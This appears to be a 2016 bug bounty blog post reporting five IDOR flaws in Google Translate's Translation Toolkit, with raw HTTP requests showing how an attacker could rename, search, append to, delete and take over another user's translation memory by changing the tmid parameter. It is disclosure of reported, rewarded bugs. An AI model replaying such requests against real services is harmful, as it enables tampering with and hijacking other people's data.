Wednesday 29 June 2016

5 IDORs in translate.google.com

Hello,

Shailesh here!

There is a module named "Translation Toolkit" in https://translate.google.com and i found that a sub-module named "Translation Memories" was fully vulnerable to IDOR vulnerabilities!

I found 5 IDORs in Translation Memories.
 
1. IDOR to change name of victim's Translation Memory :
An attacker was able to change name of victim's translation memory because there was lack of proper ACLs at this endpoint.

HTTP Request :
POST /toolkit/utmname?hl=en HTTP/1.1
Host: translate.google.com

..

security_token=AKrFfvIvi97LGuNHa3w_vpTZyWwPszzm5g%3A1467183119818&tmid=8a73972848d860ed&tmname=renamed_by_attacker

2. IDOR to search from victim's Translation Memory :

An attacker was able to search from victim's translation memory because there was lack of proper ACLs at this endpoint too.

HTTP Request :
POST /toolkit/gettm HTTP/1.1
Host: translate.google.com
...

hl=en&src=a&sl=en&tl=sq&tmids=1e0cd01b8a7bde44&thld=0&mofmt=true

3. IDOR to replace or add .tmx file into victim's Translation Memory : 

You may find something about .tmx file from Here. I used such .tmx file to add some data into victim's Translation Memory. I was able to replace or combine .tmx data into victim's translation memory because of lack of proper ACLs on uploading .tmx file into a Translation Memory.

HTTP Request :
POST /toolkit/tmappend?hl=en HTTP/1.1
Host: translate.google.com
..

------WebKitFormBoundarymGTgNNHKz4FAMIdY
Content-Disposition: form-data; name="security_token"

AKrFfvKLf60q11l-TlCENLERqMD0KI9LAA:1447909448118
------WebKitFormBoundarymGTgNNHKz4FAMIdY
Content-Disposition: form-data; name="tmid"

07a132fa949ac969
------WebKitFormBoundarymGTgNNHKz4FAMIdY
Content-Disposition: form-data; name="tloc"; filename="my_memory (1).tmx"
Content-Type: application/octet-stream
<XML>...
------WebKitFormBoundarymGTgNNHKz4FAMIdY--

4. IDOR to delete victim's Translation Memory :

Yeah!!  Also, There was no
ACLs at this endpoint. So an attacker was able to delete victim's translation memory using a simple IDOR mechanism.

HTTP Request :
POST /toolkit/deletetm HTTP/1.1
Host: translate.google.com
..
hl=en&tmids=850b211b36c39a1e&security_token=AKrFfvKaPs2JVm4aGg8xLSyE_-o1RMc-Uw%3A1467184220688

5. IDOR to takeover victim's Translation Memory :

There was no ACLs on sharing a Translation Memory with an user. So an attacker was able to share victim's Translation Memory with himself to be an owner of that particular Translation Memory.

HTTP Request :
POST /toolkit/utminfo HTTP/1.1
Host: translate.google.com
Connection: keep-alive
Content-Length: 396
...


hl=en&tmid=1e0cd01b8a7bde44&acl=[{"access":7,"me":true,"email":"victim.dummy.4594@gmail.com"},{"access":7,"email":"attacker.dummy.4594@gmail.com"},{"email":"@gmail.com","access":7,"caa":false,"new":true}]&ntfy=true&copy=false&security_token=xxxxxx:144786375312

In short, i was able to modify victim's Translation Memory.
For all requests, tmid(s) was a vulnerable parameter!

That's all ;)

Due to low-sensitive data leakage, i received a combined bounty of $3133.7 from Google.




Thank you for reading!  :-)

-Shailesh Suthar